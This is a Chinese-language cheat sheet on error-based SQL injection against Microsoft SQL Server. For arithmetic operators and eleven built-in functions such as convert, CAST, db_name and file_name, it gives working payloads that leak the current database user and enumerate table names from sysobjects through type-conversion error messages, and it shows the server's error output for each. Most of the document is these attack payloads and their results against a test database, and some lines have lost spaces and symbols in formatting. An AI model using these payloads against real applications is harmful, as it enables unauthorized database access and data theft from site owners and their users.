- 0x01 前言
- 0x02 基础数据
- 0x03 算术运算符-爆错注入
- 0x04 convert(int,str) 函数-爆错注入
- 0x05 CAST(expressionASdata_type) 函数-爆错注入
- 0x06 db_name() 函数-爆错注入
- 0x07 COL_NAME(table_id , column_id) 函数-爆错注入
- 0x08 filegroup_name() 函数-爆错注入
- 0x09 object_name() 函数-爆错注入
- 0x10 suser_name() 函数-爆错注入
- 0x11 user_name() 函数 -爆错注入
- 0x12 schema_name() 函数-爆错注入
- 0x13 type_name() 函数-爆错注入
- 0x14 file_name() 函数-爆错注入
0x01 前言
报错注入利用的就是类型转换时发生的错误来进行注入
所以只要能够导致类型转换错误的函数/方法都可以用来进行爆错注入
但是最重要的呢,还是服务器要会把爆错的信息返回回来才行呢~
| 支持进行爆错注入得函数 |
|---|
| convert() |
| CAST() |
| db_name() |
| col_name() |
| filegroup_name() |
| object_name() |
| suser_name() |
| user_name() |
| schema_name() |
| type_name() |
| file_name() |
0x02 基础数据
1> select * from article;2> go+----+-----------+-----------+| id | title | content |+----+-----------+-----------+| 1 | 测试标题 | 测试内容 || 2 | 测试标题2 | 测试内容2 |+----+-----------+-----------+(2 rows affected)
# 测试表数据: users;sql server> select * from users;+----+--------------+----------+| id | username | password |+----+--------------+----------+| 1 | test-user-01 | 123456 || 2 | test-user-02 | 234567 |+----+--------------+----------+2 rows in set (0.00 sec)
sql server> SELECT system_user;+-----------------------+| field1 |+-----------------------+| sa |+-----------------------+1 row in set (0.00 sec)
sql server> select db_name();+-----------------------+| field1 |+-----------------------+| test |+-----------------------+1 row in set (0.00 sec)
0x03 算术运算符-爆错注入
也就是利用 + - * / 来进行注入
0x03.1 查询user
SQL:select from article where id=1 and 1=1user
# 查询 user1> select * from article where id=1 and 1=1*user;2> go22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x03.2 查询表名
注意:
OVER(Order by table_name) 里面的 name 要修改为 test.dbo.sysobjects 表里面存在的一个字段
查询不同的库可以这样
例如现在有 test库 与 test2库
那么就可以这样调用
test.dbo.sysobjects
test2.dbo.sysobjects
查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2
注意:
XType=’U’ 表示获取某数据库的所有用户表;
XType=’S’ 表示获取某数据库的所有系统表;
例如现在查询得是 test 库得表名
SQL:select from article where id=1 and 1=1(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1)
# 爆表名1> SELECT*FROMarticleWHEREid = 1AND 1 = 1 * (SELECTnameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.sysobjectsWHEREXType = 'U') AS aWHERErow_number = 1);2> go22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
0x04 convert(int,str) 函数-爆错注入
0x04.1 查询user
SQL:select from article where id=1 and 1=1convert(int,user)
1> select * from article where id=1 and 1=convert(int,user);2> go22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x04.2 查询表名
SQL:select * from article where id=1 and 1=(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1)
1> SELECT*FROMarticleWHEREid = 1AND 1 = (SELECTnameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.sysobjectsWHEREXType = 'U') AS aWHERErow_number = 1);2> go22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
0x05 CAST(expressionASdata_type) 函数-爆错注入
0x05.1 查询user
SQL:select * from article where id=1 and 1=cast(user as int)
1> select * from article where id=1 and 1=cast(user as int);2> go22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x05.2 查询表名
SQL:select * from article where id=1 and 1=cast((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1) as int)
1> SELECT*FROMarticleWHEREid = 1AND 1 = CAST ((SELECTnameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.sysobjectsWHEREXType = 'U') AS aWHERErow_number = 1) AS INT);2> go22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
0x06 db_name() 函数-爆错注入
0x06.1 查询user
SQL:select * from article where id=1 and 1=db_name(user)
1> select * from article where id=1 and 1=db_name(user);2> go22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x06.2 查询表名
SQL:select * from article where id=1 and 1=db_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))
1> SELECT*FROMarticleWHEREid = 1AND 1 = db_name((SELECTnameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.sysobjectsWHEREXType = 'U') AS aWHERErow_number = 1));2> go22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
0x07 COL_NAME(table_id , column_id) 函数-爆错注入
0x07.1 查询user
SQL:select * from article where id=1 and 1=col_name(1,user)
1> select * from article where id=1 and 1=col_name(1,user);2> go22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x07.2 查询表名
SQL:select * from article where id=1 and 1=col_name(1,(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))
1> SELECT*FROMarticleWHEREid = 1AND 1 = col_name(1,(SELECTnameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.sysobjectsWHEREXType = 'U') AS aWHERErow_number = 1));2> go22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
0x08 filegroup_name() 函数-爆错注入
0x08.1 查询user
SQL:select * from article where id=1 and 1=filegroup_name(user)
1> select * from article where id=1 and 1=filegroup_name(user);2> go22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 smallint 时失败。
0x08.2 查询表名
SQL:select * from article where id=1 and 1=filegroup_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))
1> SELECT*FROMarticleWHEREid = 1AND 1 = filegroup_name((SELECTnameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.sysobjectsWHEREXType = 'U') AS aWHERErow_number = 1));2> go22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 smallint 时失败。
0x09 object_name() 函数-爆错注入
0x09.1 查询user
SQL:select from article order by idobject_name(user)
1> select * from article order by id*object_name(user);2> go22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x09.2 查询表名
SQL:select from article order by idobject_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))
1> SELECT*FROMarticleORDER BYid * object_name((SELECTnameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.sysobjectsWHEREXType = 'U') AS aWHERErow_number = 1));2> go22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
0x10 suser_name() 函数-爆错注入
0x10.1 查询user
SQL:select from article order by idsuser_name(user)
1> select * from article order by id*suser_name(user);2> go22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x10.2 查询表名
SQL:select from article order by idsuser_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))
1> SELECT*FROMarticleORDER BYid * suser_name((SELECTnameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.sysobjectsWHEREXType = 'U') AS aWHERErow_number = 1));2> go22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
0x11 user_name() 函数 -爆错注入
0x11.1 查询user
SQL:select from article order by iduser_name(user)
1> select * from article order by id*user_name(user);2> go22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x11.2 查询表名
SQL:select from article order by iduser_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))
1> SELECT*FROMarticleORDER BYid * user_name((SELECTnameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.sysobjectsWHEREXType = 'U') AS aWHERErow_number = 1));2> go22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
0x12 schema_name() 函数-爆错注入
0x12.1 查询user
SQL:select * from article order by schema_name(user);
1> select * from article order by schema_name(user);2> go22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x12.2 查询表名
SQL:select * from article order by schema_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))
1> SELECT*FROMarticleORDER BYschema_name((SELECTnameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.sysobjectsWHEREXType = 'U') AS aWHERErow_number = 1));2> go22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
0x13 type_name() 函数-爆错注入
0x13.1 查询user
SQL:select * from article order by type_name(user)
1> select * from article order by type_name(user);2> go22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x13.2 查询表名
SQL:select * from article order by type_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))
SELECT*FROMarticleORDER BYtype_name((SELECTnameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.sysobjectsWHEREXType = 'U') AS aWHERErow_number = 1))
0x14 file_name() 函数-爆错注入
0x14.1 查询user
SQL:select * from article order by file_name(user)
1> select * from article order by file_name(user);2> go22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x14.2 查询表名
SQL:select * from article order by file_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))
1> SELECT*FROMarticleORDER BYfile_name((SELECTnameFROM(SELECTROW_NUMBER () OVER (ORDER BY name) AS row_number,nameFROMtest.dbo.sysobjectsWHEREXType = 'U') AS aWHERErow_number = 1));2> go22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
若有收获,就点个赞吧
0 人点赞
